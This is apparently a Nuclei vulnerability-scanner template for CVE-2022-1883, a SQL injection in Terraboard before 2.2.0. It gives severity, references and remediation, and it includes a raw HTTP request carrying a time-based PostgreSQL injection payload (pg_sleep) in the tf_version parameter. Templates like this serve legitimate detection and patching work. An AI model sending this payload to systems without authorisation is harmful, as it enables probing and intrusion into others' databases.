nuclei-templates/http/cves/2022/CVE-2022-1883.yaml

55 lines
1.8 KiB
YAML

id: CVE-2022-1883
info:
name: Terraboard <2.2.0 - SQL Injection
author: edoardottt
severity: high
description: |
Terraboard prior to 2.2.0 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
remediation: |
Upgrade Terraboard to version 2.2.0 or later to mitigate the SQL Injection vulnerability.
reference:
- https://huntr.dev/bounties/a25d15bd-cd23-487e-85cd-587960f1b9e7/
- https://github.com/camptocamp/terraboard/commit/2a5dbaac015dc0714b41a59995e24f5767f89ddc
- https://huntr.dev/bounties/a25d15bd-cd23-487e-85cd-587960f1b9e7
- https://nvd.nist.gov/vuln/detail/CVE-2022-1883
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-1883
cwe-id: CWE-89
epss-score: 0.12202
epss-percentile: 0.94827
cpe: cpe:2.3:a:camptocamp:terraboard:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: camptocamp
product: terraboard
tags: cve,cve2022,terraboard,sqli,huntr
http:
- raw:
- |
@timeout: 10s
GET /api/search/attribute?versionid=*&tf_version=%27+and+(select%20pg_sleep(10))+ISNULL-- HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=5'
- type: word
part: body
words:
- '"page":'
- '"results":'
condition: and
- type: status
status:
- 200
# digest: 4b0a0048304602210082703ed8e3595c7cedab6740a311e9d8b3fa3c13d445ec2d203ee8a5adeeba5a022100d4136cfd0e7b84b4306ada2233b271d675e31101c931204c8f02af77423fef12:922c64590222798bb761d5b6d8e72950